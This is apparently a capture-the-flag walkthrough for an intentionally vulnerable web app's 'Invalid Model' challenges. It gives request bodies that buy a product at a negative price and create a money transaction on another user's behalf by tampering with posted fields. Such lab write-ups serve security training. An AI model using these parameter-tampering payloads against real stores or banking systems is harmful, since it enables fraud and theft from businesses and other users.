Invalid Model
Challenge
#1: Buy product for another price
Buy a product from the store for another price that is listed.
Solution
Create a custom post request on /api/Store/BuyProduct
with the following body.
{
"id": 1,
"quantity": 1,
"price": -10
}
You will find the flag in the response header.
#2: Create a transaction for another user
Create a transaction for another user.
Solution
Create a post request to Transaction/Create
with the following body. Don't forget about the RequestVerification token and cookie in your request.
SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:
You can find the flag in the response cookie.
Last updated
Was this helpful?